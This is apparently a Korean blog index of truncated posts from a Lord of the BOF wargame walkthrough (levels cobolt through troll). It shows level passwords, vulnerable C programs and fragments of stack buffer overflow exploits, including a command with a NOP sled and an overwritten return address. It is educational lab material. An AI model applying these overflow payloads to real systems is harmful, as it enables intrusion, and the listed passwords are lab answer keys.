SystemHacking/LOB(BOF원정대)(20)
-
[8] orge -> troll ( argv[0] , Symbolic Link )
orge / timewalker[orge@localhost orge]$ /bin/bash2[orge@localhost orge]$ SHELL=/bin/bash2 [ troll.c ]12345678910111213141516171819202122232425262728293031323334353637383940414243 #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; // here is changed if(argc != 2){ printf("argc must be two!\n"); exit(0); } // egghunter for(i=0; environ[i]; i++) memset(en..
2017.11.17 -
[7] darkelf -> orge ( 심볼릭링크 & argv[2] 활용 )
darkelf / kernel crashed[darkelf@localhost darkelf]$ /bin/bash2[darkelf@localhost darkelf]$ export SHELL=/bin/bash2 [ orge.c ]1234567891011121314151617181920212223242526272829303132333435363738394041424344#include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc 48){ printf("argument is too long!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n",..
2017.11.17 -
[6] wolfman -> darkelf ( argv[2] 활용 )
wolfman / love eyuna[wolfman@localhost wolfman]$ /bin/bash2[wolfman@localhost wolfman]$ SHELL=/bin/bash2 [ darkelf.c ]123456789101112131415161718192021222324252627282930313233343536373839 #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc 48){ printf("argument is too long!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); // buff..
2017.11.17 -
[5] orc -> wolfman ( argv[2] 활용 )
orc / cantata[orc@localhost orc]$ /bin/bash2[orc@localhost orc]$ export SHELL=/bin/bash2 [ wolfman.c ] 12345678910111213141516171819202122232425262728293031#include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc 환경변수 초기화 for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47] != '\xbf') { printf("stack is still your frien..
2017.11.17 -
[4] goblin -> orc ( argv[2] 활용 )
goblin / hackers proof[goblin@localhost goblin]$ /bin/bash2[goblin@localhost goblin]$ export SHELL=/bin/bash2 [ orc.c ]123456789101112131415161718192021222324252627282930 #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc 보정작업[goblin@localhost goblin]$ ./orc $(python -c 'print "A" * 44 + "\x3c\xf9\xff\xbf"') $(python -c 'print "\x90" * 1000 + "..
2017.11.17 -
[3] cobolt -> goblin ( cat 명령어 )
cobolt / hacking exposed[cobolt@localhost cobolt]$ /bin/bash2[cobolt@localhost cobolt]$ SHELL=/bin/bash2 [ goblin.c ] 12345678 int main(){ char buffer[16]; gets(buffer); printf("%s\n", buffer);} cs [ Stack 구조 ]buffer 16bytesaved ebp 4bytesaved eip RET 이전 문제와는 다르게 인자가 아닌 고블린파일을 실행 한 뒤 gets함수를 통해 문자열을 입력받습니다" cat " 을 이용한 오버플로우를 수행하도록 합시다 1> 환경변수에 쉘코드를 올린다[cobolt@localhost cobolt]$ export ..
2017.11.17